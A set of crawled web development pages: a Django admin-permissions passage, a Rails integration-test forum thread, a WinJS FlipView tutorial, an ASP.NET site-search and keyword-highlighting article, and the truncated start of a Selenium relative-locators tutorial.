('title', 'publisher', 'publication_date') list_filter = ('publication_date',) date_hierarchy = 'publication_date' ordering = ('-publication_date',) filter_horizontal = ('authors',) raw_id_fields = ('publisher',) Figure 6-14. The book edit form after adding raw_id_fields What do you enter in this input box? The database ID of the publisher. Given that humans don’t normally memorize database IDs, there’s also a magnifying-glass icon that you can click to pull up a pop-up window, from which you can select the publisher to add. Because you’re logged in as a superuser, you have access to create, edit, and delete any object. Naturally, different environments require different permission systems – not everybody can or should be a superuser. Django’s admin site uses a permissions system that you can use to give specific users access only to the portions of the interface that they need. These user accounts are meant to be generic enough to be used outside of the admin interface, but we’ll just treat them as admin user accounts for now. In Chapter 14, we’ll cover how to integrate user accounts with the rest of your site (i.e., not just the admin site). You can edit users and permissions through the admin interface just like any other object. We saw this earlier in this chapter, when we played around with the User and Group sections of the admin. User objects have the standard username, password, e-mail and real name fields you might expect, along with a set of fields that define what the user is allowed to do in the admin interface. First, there’s a set of three boolean flags: “Normal” admin users – that is, active, non-superuser staff members – are granted admin access through assigned permissions. Each object editable through the admin interface (e.g., books, authors, publishers) has three permissions: a create permission, an edit permission and a delete permission. Assigning permissions to a user grants the user access to do what is described by those permissions. When you create a user, that user has no permissions, and it’s up to you to give the user specific permissions. For example, you can give a user permission to add and change publishers, but not permission to delete them. Note that these permissions are defined per-model, not per-object – so they let you say “John can make changes to any book,” but they don’t let you say “John can make changes to any book published by Apress.” The latter functionality, per-object permissions, is a bit more complicated and is outside the scope of this book but is covered in the Django documentation. Note Access to edit users and permissions is also controlled by this permission system. If you give someone permission to edit users, she will be able to edit her own permissions, which might not be what you want! Giving a user permission to edit users is essentially turning a user into a superuser. You can also assign users to groups. A group is simply a set of permissions to apply to all members of that group. Groups are useful for granting identical permissions to a subset of users. After having worked through this chapter, you should have a good idea of how to use Django’s admin site. But we want to make a point of covering when and why you might want to use it – and when not to use it. Django’s admin site especially shines when nontechnical users need to be able to enter data; that’s the purpose behind the feature, after all. At the newspaper where Django was first developed, development of a typical online feature – say, a special report on water quality in the municipal supply – would go something like this: In other words, the raison d’être of Django’s admin interface is facilitating the simultaneous work of content producers and programmers. However, beyond these obvious data entry tasks, the admin site is useful in a few other cases: One final point we want to make clear is: the admin site is not an end-all-be-all. Over the years, we’ve seen it hacked and chopped up to serve a variety of functions it wasn’t intended to serve. It’s not intended to be a public interface to data, nor is it intended to allow for sophisticated sorting and searching of your data. As we said early in this chapter, it’s for trusted site administrators. Keeping this sweet spot in mind is the key to effective admin-site usage.
http://www.djangobook.com/en/2.0/chapter06.html
CC-MAIN-2014-42
en
refinedweb
<< Showing messages 1 through 5 of 5. - Found the cause of the error. 2008-01-05 16:43:05 TechG1rl [View] I found the problem :) But how to fix it?? Opening the home recipe list page, I viewed the source and found this line: ***** <h1>Online Cookbook</h1> <table border="1"> <tr> <th width="60%">Recipe</em</th> <th width="20%">Category</th> <th width="20%">Date</em</th> </tr> ********* The first tag is not closed fully. But this is not something that I typed in myself. I will keep hunting, but if you know how to fix it that would be greatly appreciated :) Cheers, Tara - assert_select 2008-01-02 23:33:18 TechG1rl [View] Hi, I am hoping someone can help me. I was so excited to see that the new tutorial was up today, as last week I had just finished the July tutorial :) I keep getting these errors on the first integration test. 1. If I run this test: ********** require File.dirname(__FILE__) + '/../test_helper' class Cookbook2IntegrationTest < ActionController::IntegrationTest fixtures :categories fixtures :recipes def test_the_home_page browse_to_the_home_page check_the_home_page_title end private def browse_to_the_home_page get "/" assert_response :success assert_template "recipe/list" end def check_the_home_page_title assert_select "h1", {:text=>"Online Cookbook"} end end *********** I get this response: ********* Loaded suite cookbook2_integration_test Started E Finished in 0.245284 seconds. 1) Error: test_the_home_page(Cookbook2IntegrationTest): RuntimeError: expected > (got "" for /var/rails/cookbook2/config/../vendor/rails/actionpack/lib/action_controller/assertions/../vendor/html-scanner/html/node.rb:193:in `parse' /var/rails/cookbook2/config/../vendor/rails/actionpack/lib/action_controller/assertions/../vendor/html-scanner/html/document.rb:20:in `initialize' /var/rails/cookbook2/config/../vendor/rails/actionpack/lib/action_controller/test_process.rb:439:in `new' /var/rails/cookbook2/config/../vendor/rails/actionpack/lib/action_controller/test_process.rb:439:in `html_document' /var/rails/cookbook2/config/../vendor/rails/actionpack/lib/action_controller/assertions/selector_assertions.rb:555:in `response_from_page_or_rjs' /var/rails/cookbook2/config/../vendor/rails/actionpack/lib/action_controller/assertions/selector_assertions.rb:197:in `assert_select' cookbook2_integration_test.rb:21:in `check_the_home_page_title' cookbook2_integration_test.rb:10:in `test_the_home_page' /var/rails/cookbook2/config/../vendor/rails/actionpack/lib/action_controller/integration.rb:453:in `run' 1 tests, 2 assertions, 0 failures, 1 errors ******* I am modifying the tutorial as I go for my system, which is Ubuntu Feisty Fawn, Apache2 as the webserver. If I run the test without assert_select, it passes with no errors. So, I am wondering if maybe assert_select is not loaded correctly in my rails version???? But, I don't know. Thanks in advance for any help on this. Happy New Year! - assert_select 2008-01-03 08:18:51 Bill Walton | [View] Hi TechG1rl, Happy Opening the home recipe list page, I viewed the source and found this: ***** <h1>Online Cookbook</h1> <table border="1"> <tr> <th width="60%">Recipe</em</th> <th width="20%">Category</th> <th width="20%">Date</em</th> </tr> ********* The first and third tag is not closed fully. I found this is from the recipe/list file so I opened that up and added the end tags. Re-ran the test and got another error, "method href not found", so on a hunch I changed this: assert_select "a", {:text=>"Create new recipe", href=>"recipe/new"} to this (colon in front of href was missing): assert_select "a", {:text=>"Create new recipe", :href=>"recipe/new"} re-ran the test and no more failures :) yay we can move on. Thanks for your speedy reply earlier. Cheers, Tara
http://oreillynet.com/pub/a/ruby/2008/01/02/cookin-with-ruby-on-rails---integration-tests.html?page=7
CC-MAIN-2014-42
en
refinedweb
FlipView, represents an item control which displays one item at a time and enables user to use the flip behavior which is used for traversing through the collection of items. Typically such a control is used for traversing through Product Catalog, Books information etc. Technically the FlipView is a control provided in Windows Store Apps through Windows Library for JavaScript. The data to FlipView is made available through IListDataSource. (Note: You can get data from an external web sources like, web service, WCF service, WEB API in the JSON format). We will use the FlipView for iterating through Images that’s passed to it from the WinJS List object. Step 1: Open VS2012 and create a new Windows Store Apps using JavaScript. Name it as ‘Store_JS_FlipView’. In this project add some images in the ‘images’ folder. (I have some images as Mahesh.png, SachinN.png,SachinS.png, KiranP.jpg). Step 2: In the default.html add the below Html code: <div id="trgFilpView" data-</div> Note that the <div> is set to the WinJS.UI.FlipView using data-win-control property. Step 3: Add the style for the FlipView in the default.html as below: <style type="text/css"> #trgFilpView { width: 600px; height: 500px; border: solid 1px black; background-color:coral; } </style> Step 4: Since the FlipView accepts the IListDataSource, we need to define it as JSON data. To do this, add a new JavaScript file in the project, name it as ‘dataInformation.js’. Add the following code in it: (function () { "use strict"; //The JavaScript Array. var trainerArray = [ { name: "Sachin Shukre", image: "images/SachinS.jpg", description: "The Senior Corporate Trainer for C,C++" }, { name: "Mahesh Sabnis", image: "images/Mahesh.png", description: "The Senior Corporate Trainer for .NET" }, { name: "Sachin Nimbalkar", image: "images/SachinN.jpg", description: "The Senior Corporate Trainer for Client Side Frameworks" }, { name: "Mahesh Sabnis", image: "images/KiranP.jpg", description: "The Senior Corporate Trainer for C# and ASP.NET" }]; //Define the List from the Array var trainersList = new WinJS.Binding.List(trainerArray); //This is the Private data //To expose Data publically, define namespace which defines //The object containing the Property-Value pair. //The property is the public name of the member and the value is variable which contains data var trainersInfo = { trList:trainersList }; WinJS.Namespace.define("TrainersInformation", trainersInfo); })(); The above code defines a JSON array with hard-coded data in it. This array is then passed to the ‘trainersList’ object defined as a List object using WinJS.Binding.List(). Since the array and the List are declared as private objects, these will not be exposed to the FlipView. To do this, we need to define the namespace which defines an object with property/value pair. The namespace is defined using WinJS.Namespace.define(). The ‘trList’ is the public property which contains the ‘trainersList’. This is now exposed to the FlipView. Step 5: To display data into the FlipView, we need to define a Template for showing the repeated data. (Note: This is conceptually similar to templates in XAML). In the default.html add the below <div> tag, this is set to the WinJS.Binding.Template. <!--Define the Template Here--> <div id="DataTemplate" data- <div> <img src="#" data- <div> <h3 data-</h3> <h4 data-</h4> </div> </div> </div> <!--Ends Here--> The above template contains <img> which is bound to the ‘image’ property. which is coming from the List which is defined in Step 4 using the Array. The header <h3> and <h4> are used for displaying ‘name’ and ‘description’ declared in the array. Step 6: To display the data in the FlipView, change the <div> with id ‘trgFlipView’ as shown below: <div id="trgFilpView" data-win-control="WinJS.UI.FlipView" data-win-options= "{ itemDataSource:TrainersInformation.trList.dataSource, itemTemplate:DataTemplate }"> </div> To connect to the data, the itemsDataSource property of the FlipView is used. This property is assigned to trList object defined in the namespace in Step 4. The ItemTemplate property is set to the DataTemplate defined in Step 5. Run the application, you will get the First Record from the Array. Click on the Flip Navigation button, the next record will be displayed: ConclusionWe saw how to bind an array of images to a FlipView control in WinJS. We can use the FlipView control to display any page-wise data, for example magazines, books etc. The entire source code of this article can be downloaded at Will you give this article a +1 ? Thanks in advance comments0 Responses to "Using FlipView Control in Windows Store Apps using JavaScript and HTML"
http://www.devcurry.com/2013/03/using-flipview-control-in-windows-store.html
CC-MAIN-2014-42
en
refinedweb
26 March 2012 09:00 [Source: ICIS news] ?xml:namespace> Yara investigation finds unacceptable payments at Swiss JV Yara International has uncovered unacceptable payments from a former joint venture in Shell lifts Moerdijk cracker products force majeure Shell Chemicals has lifted the force majeure on cracker products from its Moerdijk facility in the Europe PP buyers paying huge hikes in March Polypropylene (PP) buyers in Styrolution to cut SM, PS offtake in Styrolution will no longer take styrene monomer (SM) and polystyrene (PS) from its joint-venture plants in Marl, Germany, while it increases styrene copolymer capacities in Germany, India and South Korea, the company
http://www.icis.com/Articles/2012/03/26/9544570/europe-top-stories-weekly-summary.html
CC-MAIN-2014-42
en
refinedweb
Hi there ..... Just to let you know Cheatah no longer seems to compile against the latest CVS (using the namespace feature). I've managed to get my own module making tools to compile and link OK after adding the following (from addvs.cpp) - #ifndef NO_SWORD_NAMESPACE using sword::SWMgr; using sword::RawText; using sword::SWKey; using sword::VerseKey; using sword::ListKey; using sword::SWModule; #endif I don't know how to alter Cheatah - and I only use it to check out the library each time I rebuild, but I thought I ought to report it. God bless, Barry -- From Barry Drake (The Revd) minister of the Arnold and the Netherfield United Reformed Churches, Nottingham see and for our church homepages). Replies - [email protected]
http://www.crosswire.org/pipermail/sword-devel/2002-October/016301.html
CC-MAIN-2014-42
en
refinedweb
import "github.com/mewkiz84/bytesx" Package bytesx implements highly optimized byte functions which extends the bytes package in the standard library (Currently x86 64-bit only) func EqualThreshold(a, b []byte, t uint8) bool EqualThreshold returns true if b does not differ in value more than t from the corresponding byte in a. t may take any value from 0 to 255 where 0 is exact match and 255 will match any string. If t is 1 and a is "MNO" and b is "LNP" than EqualThreshold will return true while it will return false if b is "LNQ" or "KNO". The equality check is only made untill the shortest of a and b. func IndexNotEqual(a, b []byte) int IndexNotEqual returns the index of the first non matching byte between a and b, or -1 if a and b are equal untill the shortest of the two. Updated 2013-11-07. Refresh now. Tools for package owners.
http://godoc.org/github.com/mewkiz84/bytesx
CC-MAIN-2014-42
en
refinedweb
log1p - compute a natural logarithm #include <math.h> double log1p (double x); The log1p() function computes loge(1.0 + x). The value of x must be greater than -1.0. Upon successful completion, log1p() returns the natural logarithm of 1.0 + x. If x is NaN, log1p() returns NaN and may set errno to [EDOM]. If x is less than -1.0, log1p() returns -HUGE_VAL or NaN and sets errno to [EDOM]. If x is -1.0, log1p() returns -HUGE_VAL and may set errno to [ERANGE]. The log1p() function will fail if: - [EDOM] - The value of x is less than -1.0. The log1p() function may fail and set errno to: - [EDOM] - The value of x is NaN. - [ERANGE] - The value of x is -1.0. No other errors will occur. None. None. None. log(), <math.h>.
http://pubs.opengroup.org/onlinepubs/7990989775/xsh/log1p.html
CC-MAIN-2014-42
en
refinedweb
From: George Bosilca (bosilca_at_[hidden]) Date: 2007-02-13 19:10:44. How many memory barrier we have now on the critical path ? Are they all really necessary ? In fact I try to figure out what the problem is ? Why this doesn't happens with any other compiler ? Is this our bug or a PathScale compiler bug ? And the last one: What is the correct way to fix it in a generic way without affecting the performances by 10%. As a matter of fact, we're already slower than MPICH2 for shared memory operations, so something is flawed in our design ... Thanks, george. On Feb 13, 2007, at 4:20 PM, gshipman_at_[hidden] wrote: > Author: gshipman > Date: 2007-02-13 16:20:59 EST (Tue, 13 Feb 2007) > New Revision: 13644 > > Modified: > trunk/opal/include/opal/sys/atomic_impl.h > > Log: > use memory barriers for lock init and unlock > > > Modified: trunk/opal/include/opal/sys/atomic_impl.h > ====================================================================== > ======== > --- trunk/opal/include/opal/sys/atomic_impl.h (original) > +++ trunk/opal/include/opal/sys/atomic_impl.h 2007-02-13 16:20:59 > EST (Tue, 13 Feb 2007) > @@ -337,6 +337,7 @@ > opal_atomic_init( opal_atomic_lock_t* lock, int value ) > { > lock->u.lock = value; > + opal_atomic_mb(); > } > > > @@ -368,6 +369,7 @@ > OPAL_ATOMIC_LOCKED, OPAL_ATOMIC_UNLOCKED); > */ > lock->u.lock=OPAL_ATOMIC_UNLOCKED; > + opal_atomic_mb(); > } > > #endif /* OPAL_HAVE_ATOMIC_SPINLOCKS */ > _______________________________________________ > svn mailing list > svn_at_[hidden] > "Half of what I say is meaningless; but I say it so that the other half may reach you" Kahlil Gibran
http://www.open-mpi.org/community/lists/devel/2007/02/1295.php
CC-MAIN-2014-42
en
refinedweb
XmlReader::ReadContentAsAsync Method Asynchronously reads the content as an object of the type specified. Namespace: System.XmlNamespace: System.Xml Assembly: System.Xml (in System.Xml.dll) Parameters - returnType - Type: System::Type The type of the value to be returned. - namespaceResolver - Type: System.Xml::IXmlNamespaceResolver An IXmlNamespaceResolver object that is used to resolve any namespace prefixes related to type conversion. Return ValueType: System.Threading.Tasks::Task<Object> The concatenated text content or attribute value converted to the requested type. This is the asynchronous version of ReadContentAs,.
http://msdn.microsoft.com/en-us/library/system.xml.xmlreader.readcontentasasync.aspx?cs-save-lang=1&cs-lang=cpp
CC-MAIN-2014-42
en
refinedweb
Published: 6/3/2011 By: Xianzhong Zhu Contents [hide] 1 Introduction 2 Introduction to Regular Expressions 3 Create a Site Search Module 4 Establishing an Universal Search Entrance 5 Create a Search Results Page 5.1 Design the markup code 5.2 Behind code design 5.3 Write the extension method HighlightKeyword 6 Optimize the In-site Searching Module 6.1 Matching accuracy 6.2 User experience 6.3 Keywords filtering issue and URL routing 7 Summary In the last several parts of this series you leaned the backend and front-end modules of the Q&A sample application, as well as part of SEO related techniques under the ASP.NET 4.0 environment. In this part, we will shift out attention to delve into how to construct the internal searching module, what kinds of techniques you should have to accomplish such a module, and what kinds of SEO optimization actions should be taken. You will see we are going to resort to LINQ to Entities to execute the searching operation. And also, C# Regular Expression will play an important role in optimizing such a module and rendering user-friendly searching results. The sample test environments in this series involve: 1. Windows 7; 2. .NET 4.0; 3. Visual Studio 2010; 4. SQL Server 2008 Express Edition & SQL Server Management Studio Express. Regular expressions are used to find and match strings (of course, can also be used for substitution). Regular expressions provide a powerful, flexible, and efficient way to deal with text. Comprehensive pattern matching notation of regular expressions allows you to quickly analyze large amounts of text to find specific character patterns; extract, edit, replace, or delete text substrings; or add the extracted strings to the collection in order to generate a report. For many applications to deal with strings (such as HTML, log file analysis and HTTP header analysis), regular expressions are an indispensable tool. With the help of regular expressions, you can implement the following features: 1. Test the string model within a given string For example, you can test the input string to see if the phone number pattern or credit card number pattern occurs within a specified string. This is often called data validation. 2. Replace the text You can use a regular expression to identify the specific text in the document, completely remove it or replace it with other text. 3. Extract a substring from a string based on a matching pattern You can use regular expressions to find specific text within a document or an input field. In a certain sense Regular expressions constitutes a language. As a language, the regular expression has its own syntax and words (elements). When the language is integrated into C#, it shows more powerful features. C# provides the Regex class (defined in the namespace System.Text.RegularExpressions) to represent an immutable regular expression. The Regex class provides plenty of methods associated with regular expressions match, substitution, and verification. Due to space limit and delving into it will be far from our main topic, you can refer to MSDN and the famous regular expressions tutorial site to find out details. On the bases of the questions and answers modules established previously, let's now create an independent search module for the Q&A sample application. On the whole, the searching module consists of the following crucial areas and technical points: Note that the query method that is described in this article is still based on LINQ to Entities leveraged before. Next, we will first set up the fundamentals of the searching module, and then we will explore the related local optimization policies. Generally speaking, the search entry can be placed in a special page, or in a master page of the global Web site or even in a local module. In our case, we will build the search portal on the master page of the Q&A module. Now look at the search entry located inside the master page Site.Master. Figure 1 illustrates the design-time screenshot. Note our interested point currently concentrates upon the searching entrance at the upper right corner. As for another searching entrance at the lower part we'll delve into it in a future article particular at the buffering support and related optimization for the searching functionality. Below indicates the main markup code associated with the basic searching support inside the master page. For simplicity, we've not utilized tips to show more friendly prompt info at the textbox. In fact, there are numerous existing solutions for this; you can search it through Internet or implement your own. Let's next continue to look at the behind coding related to the button Button1. Here we use Server.UrlEncode to encode the content in the TextBox control txtKeyword. In this way, when passing it as the URL parameter we can achieve better compatibility while not have side effect upon the server URL resolve. The searching bar provides basic function, passing the searching parameter to the search result page leaving it to be responsible for related query and output, rather than do this within a PostBack request of the master page. Such a decision will result in the following advantages: Server.UrlEncode txtKeyword (1) Separation of logic Not implementing complex logic in such non-functional pages as the master page or search page will optimize logic, so that special pages do special things. (2) Easier access In the above code, directly jumping to the search results page and providing the "kw" parameter for URL can make the URL be directly and repeatedly visited. In this way, the user can bookmark this URL, so that the next time he can directly access the results list that complies with the same search conditions. Users can also spread the URL, so that other visitors directly access to the results list, without having to re-enter data to search. You will not enjoy this if you use the PostBack logic to make direct output. (3) Facilitate the migration and upgrade Passing the parameter independently is equivalent to building up an interface, so you can always pass parameters to the query module to achieve different query results. This is also a common practice in distributed systems - although the users access the same page from the same server the background processing server may be on another server, when this server can only accept a parameter and returns a corresponding result. Now that we've implemented the searching entrance and set up a way to passing parameters, it is time for us to create another new page to show the searching result. First of all, let's look at the key markup code associated with the page SearchResult.aspx (within the master page Site.Master), as follows. Here, a Repeater control is used to show all the questions related info. The most important part should be the HyperLink control embedded in the ItemTemplate template. As designed, we use URL routing technique to navigate the current user to the page Question.aspx that displays the detailed info associated with the current question. And also, we use the extension method HighlightKeyword to highlight the keyword in the question title. HighlightKeyword Next, let's go to look at the behind C# code. Here is the main code of the Page_Load event handler for the file SearchResult.aspx.cs. Page_Load The general logic above is not difficult to understand. First, use Page.RouteData.Values to obtain the passed keyword. Then, construct a complex LINQ to Entities statement to grab the question data that meet the specified conditions. As pointed out in the previous articles, such inquire solution may result in low efficiency. Cute readers can consider using stored procedures inside the database to improve the solution. At last, we bind the data to the Repeater control. That's all. Page.RouteData.Values In a more user-friendly search result page, it is better to highlight the user query keywords. As a simple approach, you can use the following way: However, there are two main disadvantages in this solution: Replace To overcome the above shortcomings, we'd better use the above-covered regular expressions. This is achieved in an extension method called HighlightKeyword in the public static class Common. Extension method is a new feature introduced since C# 3.0. The method HighlightKeywords above is just such one, as an extension method for the string type. For more details about extension method, please refer to MSDN; we'll omit the detailed introduction. HighlightKeywords As for the above method, we'll introduce a little more to let readers gain a better understanding: (1) string{0}</font></strong>". string{0}</font></strong Using this statement we define the highlighted string format. In this case, we make them red. {0} represents a placeholder of the keyword, to help to generate the complete regular expression related string. (2) string expr = @"(?<!{0})(?<kw>{0})"; string expr = @"(?<!{0})(?<kw>{0})"; This statement is used to define the regular expression string. The character @ can help to bypass some "\" related escapes, but not to omit the internal escape symbol inside a regular expression. {0} bears the same meaning as above. Using the above regular expression, two identical characters can not be close together. In addition, kw represents the name of the group (an important element associated with regular expressions). Up till now, a basic internal searching module has been finished. Till now, we've finished setting up a fundamental internal searching module. During the whole process of the implementation, some basic ideas have been shown in building up an in-site search module. However, some of the policies taken for now are now robust. The things mainly focus upon the several aspects below: As for the searching efficiency, we'll dwell upon it in the next caching topic in this series. Now, let's look at the rest points mentioned above. In the previous section, we've achieved the target of highlighting the keywords in the searching result page. It seems pretty beautiful, doesn't it? However, there are big loopholes in such simple regular expressions, one of which is matching accuracy. Next, let's consider a concrete example. For example, if the user is searching the keyword 'long', then he will find in the matched questions, such as "long long ago", multiple keywords close together will all be highlighted. This is not what the user wants. For the application, it is not wrong to highlight all keywords, such as "long", using the regular expressions. However, for the user, it seems that he just enters the keywords "long long". This case requires improving the wording of the regular expression to make the matched keywords discontinuous. To solve the above problem, you need to fall back on the atomic zero-width assertion in regular expressions. Table 1 shows the commonly-used atomic zero-width assertion symbols. Assertion Explanations Examples ^ Matches the position at the start of the searched string. If the m (multiline search) character is included with the flags, ^ m (multiline search) character is included with the flags, ^ also matches the position before \n or \r. \d{3}$ matches 3 numeric digits at the end of the searched string. \A Match must appear at the beginning of the string \Z Match must appear at the end of the string or before the newline \n at the end of the string \z Match must appear at the end of the string \G Match must appear in the place where the last match ends \b Matches a word boundary; that is, the position between a word and a space. er\b matches the "er" in "never" but not the "er" in "verb". \B Matches a word non-boundary. er\B matches the "er" in "verb" but not the "er" in "never". Let's now return to the above topic. We should modify the extension method HighlightKeyword in the file common.cs, like the following (note the bold part): Now, with the initial regular expression (?<kw>{0}) prefixed with (?<!{0}), the same contents close together will no more exist. (?<kw>{0}) (?<!{0 First, the character @ indicates that the string following it is a verbatim string. Note that the character @ only applies for constant string (for instance a file path). Second, a string starting with @ can span several lines, so that writing, in the .cs file, JavaScript or SQL script becomes more convenient. Refer to the following: @ Third, in the C# specification, the character @ can be used as the first character of an identifier (class name, variable name, method name, etc.) to allow a reserved keyword in C# as a custom identifier. Refer to the following: Note that although @ appears in the identifier, but it cannot be part of the identifier itself. Therefore, in the above example, we define a class named class, which contains a static method named static and a parameter called bool. In addition, with the symbol @ positioned before a string within a pair of double quotes some of the escape symbols can be omitted, as used in the extension method HighlightKeyword. HighlightKeyword As far as the user experience is concerned in the present searching module, there are still plenty of aspects to improve, such as: Of course, besides the above two points, there are still many areas required to improve. But since these two points are consistent with the general user's habits and representative, we'll only focus upon them and give corresponding solutions. 1. Keywords remaining Since when we implemented the searching function we used the method Response.Redirect() to jump to other page, as well as passing the related parameters, the ViewState cannot hold the entered keyword on the master page. The reason is during the course of the new GET request the textbox for the keyword in the master page will be cleared up. So, at this time, a same keyword requires to be passed to the master page and make the keyword related textbox visible, so that when the current user views the result page he can also see the keyword remain at the textbox. How can we achieve this effect? Response.Redirect() Generally, you use the following code, i.e. in the master page of the search results page via the FindControl() method, to locate the keyword input box related server control and set its Text property: FindControl() Text However, this method has a most significant drawback: strongly coupling the user control ID in the master page with the content page, which not only results in the efficiency issue but makes the ID attribute of the keyword entry box server control in the master page can not be easily changed, so that it is very detrimental to maintenance. To solve this problem, you can, in the master page, set the access level of the control txtKeyword to public: txtKeyword And also, in the content page use strong cast for Master to cast the Master type to the type of the current master page and to get from this type the target server control, and at last set the value of the server control's property: On the surface, this approach seems to be a good solution to overcome the drawbacks of using the FindControl() method. But, at the time of solving this problem, another new problem arises. That is, if specified in the page SearchResult.aspx another master page, you need to modify the type at all places where the same master page is referenced, which in turn has strengthened the coupling between the background .cs code and the front end. Another problem with this approach is to make the protected property of the txtKeyword server control changed to public itself is an unsafe practice, which makes txtKeyword accessible outside the Master page. So, how to achieve the targets of not only to meet the above requirements, but also to decouple the relationship between them? To overcome this knot, it is necessary to introduce a new thing, <% @ MasterType%>, and define a property for the master page. <% @ MasterType As the name implies, <% @ MasterType%> is the type of master page, set in an aspx page, and with the position same as <% @ Page%>, generally placed in front of the entire page. MasterType has a VirtualPath attribute, with which you can specify the type of master page. In actual use, however, you only need to specify the master page's address, the same setting as the MasterPageFile property of <% @ Page%>. <% @ MasterType%> <% @ Page MasterType VirtualPath MasterPageFile Here, we use <% @ MasterType%> in the page SearchResult.aspx to define the master page type: Thus, the type of Master in the page SearchResult.aspx is that of the file Site.Master, whose public methods can be easily visited. However, the "public" here is not the public of the control txtKeyword, but for it to create a new public accessor. In the Site.Master file add the following code: public In this way, we can from the page SearchResult.aspx visit the Keyword property of the file Site.Master and set it value. The related code is given below. Keyword Next, let's discuss another user experience related issue – keyword highlight. 2. Keywords highlight When the user from the search results page enters into the details page, if keyword highlighting feature can also be provided for the details page, this will help users to see key words within the shortest time to obtain the desired information. The highlighting feature for the details page is same as highlighting the keyword, decoding the keyword parameter of URL to obtain the initial keyword and then invoke the extension method HighlightKeyword to mark the specified contents. The detailed steps are shown below. (1) In the page Question.aspx.cs, add the property KeyWord: KeyWord (2) In the Page_Load event method add the following statement to set the KeyWord: (3) Before using the preceding Master.Keyword = KeyWord, as with the page SearchResult.aspx, you specify the master type for the page Question.aspx: Master.Keyword = KeyWord (4) Modify the method LoadInfo() called in the Page_Load event method of the page Question.aspx, so that the highlighting keywords can be applied to the specified area: LoadInfo() (5) Besides the question content and the best answer, if you also want to highlight the contents in other answers, then you can modify the code in the Repeater control in the page Question.aspx: Keyword filter in the search engine query is extremely important, because some important keywords may be involved in a database query and regular expression matching, which may affect the accuracy of inquiries or matching, so that application security and stability may be seriously affected. Take our internal search engine for the Q&A module as an example. If you enter special characters, such as "?", "/", "&", an HTTP 404 error will be thrown out by the system. In another word, URL routing does not allow such symbols as parameters passed to a URL. Now, let's look at our coding for the above case. In the file Site.Master.cs: According to MSDN, the UrlEncode() URL encoding ensures that all browsers will correctly transmit text in URL strings. Characters such as a question mark (?), ampersand (&), slash mark (/), and spaces might be truncated or corrupted by some browsers. As a result, these characters must be encoded in tags or in query strings where the strings can be re-sent by a browser in a request string.' That is, the first statement is valid and allowed in general code. But, as soon as the second statement is executed, the exception like that in Figure 2 will be thrown out. So, we can say, the ASP.NET 4.0 URL routing does not allow the above special characters as parameters passed into a URL. UrlEncode() In addition, such an ugly HTTP 404 Error page as given in Figure 2 is unfriendly. Readers can create your own special exception thrown page to handle the similar things in your real scenarios. Finally, in a real project, SQL inject is another serious issue to consider. Since this is beyond the range of this article, we'll no more detail into it. Well, till now, we've succeeded in building up a basic and still elementary in-site searching engine for the Q&A sample application. As you've seen, we've only implemented basic functionalities and provided limited optimization policies for the module. There are still more deserved to be researched into in a real project. In the next and the last article, we'll explore the possible buffering policy in constructing an internal search engine for the Q&A sample application.
http://dotnetslackers.com/articles/PrintArticle.aspx?ArticleId=634
CC-MAIN-2014-42
en
refinedweb
c/language/struct From cppreference.com < c | language Revision as of 21:04, 26 February 2013 by Smilingrob (Talk | contribs) Compound types are types that can hold multiple data members. Syntax Explanation Keywords Example Run this code #include <stdio.h> struct car { char *make; char *model; int year; }; int main() { /* external definition */ struct car c; c.make = "Nash"; c.model = "48 Sports Touring Car"; c.year = 1923; printf("%d %s %s\n", c.year, c.make, c.model); /* internal definition */ struct spaceship { char *make; char *model; char *year; } s; s.make = "Incom Corporation"; s.model = "T-65 X-wing starfighter"; s.year = "128 ABY"; printf("%s %s %s\n", s.year, s.make, s.model); return 0; } Output: 1923 Nash 48 Sports Touring Car 128 ABY Incom Corporation T-65 X-wing starfighter
http://en.cppreference.com/mwiki/index.php?title=c/language/struct&oldid=46340
CC-MAIN-2014-42
en
refinedweb
Beginning to experiement with Stanza for natural language processing After installing Stanza as dependency of UDAR which I recently described, I decided to play around with what is can do. Installation The installation is straightforward and is documented on the Stanza getting started page. First, sudo pip3 install stanza Then install a model. For this example, I installed the Russian model: #!/usr/local/bin/python3 import stanza stanza.download('ru') Usage Part-of-speech (POS) and morphological analysis Here’s a quick example of POS analysis for Russian. I used PrettyTable to clean up the presentation, but it’s not strictly-speaking necessary. #!/usr/local/bin/python3 import stanza from prettytable import PrettyTable tab = PrettyTable() tab.field_names = ["word","lemma","upos","xpos","features"] for field_name in tab.field_names: tab.align[field_name] = "l" nlp = stanza.Pipeline(lang='ru', processors='tokenize,pos,lemma') doc = nlp('Моя собака внезапно прыгнула на стол.') for sent in doc.sentences: for word in sent.words: tab.add_row([word.text, word.lemma, word.upos, word.xpos, word.feats if word.feats else "_"]) print(tab) Note that upos are the universal parts of speech where xpos are language-specific parts of speech. Named-entity recognition Stanza can also recognize named entities - persons, organizations, and locations in the text it analyzes: import stanza from prettytable import PrettyTable tab = PrettyTable() tab.field_names = ["Entity","Type"] for field_name in tab.field_names: tab.align[field_name] = "l" nlp = stanza.Pipeline(lang='ru', processors='tokenize,ner') doc = nlp("Владимир Путин живёт в Москве и является Президентом России.") for sent in doc.sentences: for ent in sent.ents: tab.add_row([ent.text, ent.type]) print(tab) which, tells us: I’m excited to see what can be built from this for language-learning purposes.
https://www.ojisanseiuchi.com/2020/08/20/beginning-to-experiement-with-stanza-for-natural-language-processing/
CC-MAIN-2021-31
en
refinedweb
What Are Selenium Relative Locators And How To Use Them In this Selenium 4 series, we will dive into Selenium Relative locators. What are Relative Locators in Selenium 4? Relative Locators in Selenium formerly known as Friendly Locators. In test automation, the automation tester our main task while writing test scripts for web applications is to locate web elements. We already know the existing Selenium locators (id, name, className, linkText, partialLinkText, tagName, cssSelector, xpath). You can learn about Selenium locators here. The point to be noted here is sometimes we may not find elements using these locators and to overcome that we use JavaScriptExecutor. You can learn about JavaScriptExecutor in Selenium here. In Selenium 4.0, a new locator added to the locator’s list i.e., Friendly locators and later it is renamed as Relative locators. It helps us to locate the web elements by its position by concerning other web elements such as above, below, toLeftOf, toRightOf, and near. In simple words, relative locators allow us to locate the web elements based on their position with respect to other web elements. There are five locators newly added in Selenium 4: above() It is to locate a web element just above the specified element below() It is to locate a web element just below the specified element toLeftOf() It is to locate a web element present on the left of a specified element toRightOf() It is to locate a web element present on the right of a specified element near() It is to locate a web element at approx. 50 pixels away from a specified element. The distance can be passed as an argument to an overloaded method. Note: Method “withTagName()” is added which returns an instance of RelativeLocator. Above relative locators support this method “withTagName()” Practical Example Selenium Relative Locators STEP 1: Import RelativeLocator ‘withTagName’ import static org.openqa.selenium.support.locators.RelativeLocator.withTagName; STEP 2: Launch a web browser and navigate to STEP 3: Locate the web element ‘Your Name’ text field STEP 4: Locate the web element ‘Your Email’ text field 